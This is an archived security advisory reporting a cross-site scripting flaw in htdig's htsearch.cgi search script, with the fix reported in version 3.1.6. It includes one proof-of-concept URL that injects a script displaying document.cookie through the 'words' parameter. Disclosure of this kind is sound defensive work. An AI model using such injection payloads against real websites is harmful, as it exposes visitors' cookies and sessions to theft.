TUCoPS :: Unix :: General :: unix5490.htm

htdig cross site scripting bug
27th Jun 2002 [SBWID-5490]
COMMAND

	htdig cross site scripting bug

SYSTEMS AFFECTED

	htdig all releases up to 3.1.5 ??

PROBLEM

	Howard Yeend found :
	

	http://<webserver>/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

	

	

	Will trigger the cross site scripting bug.

SOLUTION

	 Update (01 July 2002)

	 ======

	

	Peter Watkins  [http://www.tux.org/~peterw/  ]  says  version  3.1.6  is
	imune

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH